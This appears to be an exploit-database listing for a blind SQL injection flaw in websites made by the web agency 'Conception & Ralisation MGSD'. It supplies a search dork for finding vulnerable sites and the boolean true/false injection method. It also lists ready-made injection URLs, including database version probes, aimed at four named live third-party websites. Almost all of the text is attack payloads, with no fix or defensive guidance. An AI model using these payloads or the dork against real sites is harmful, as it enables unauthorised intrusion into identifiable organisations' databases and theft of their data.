Advertisement
********************************************************* #Exploit Title: Conception & Ralisation MGSD - Blind Sql Injection Vulnerability #Date: 2023-09-15 #Exploit Author: Behrouz Mansoori #Google Dork: "Conception & Ralisation MGSD" #Category:webapps #Tested On: Mac, Firefox [+] search Dork : "Conception & Ralisation MGSD" [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * http://www.lakelec.com/under_products_marechal.php?id=6%27%20and%20true--+ * http://www.lakelec.com/under_products_marechal.php?id=6%27%20and%20false--+ * http://www.lakelec.com/under_products_marechal.php?id=6%27%20and%20substring(@@version,1,1)=5--+ ### Demo 2: * https://www.scetenergie.com/solution_detail.php?id=1%27%20and%20true--+ * https://www.scetenergie.com/solution_detail.php?id=1%27%20and%20false--+ * https://www.scetenergie.com/solution_detail.php?id=1%27%20and%20substring(@@version,1,1)=1--+ ### Demo 3: * https://www.cmcelqods-dz.com/notre-expertise-details.php?id=2%27%20and%20true--+ * https://www.cmcelqods-dz.com/notre-expertise-details.php?id=2%27%20and%20false--+ * https://www.cmcelqods-dz.com/notre-expertise-details.php?id=2%27%20and%20substring(@@version,1,1)=1--+ ### Demo 4: * https://www.sagps.dz/details-news.php?id=1%27%20and%20true--+ * https://www.sagps.dz/details-news.php?id=1%27%20and%20false--+ * https://www.sagps.dz/details-news.php?id=1%27%20and%20substring(@@version,1,1)=1--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Copyright ©2023 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.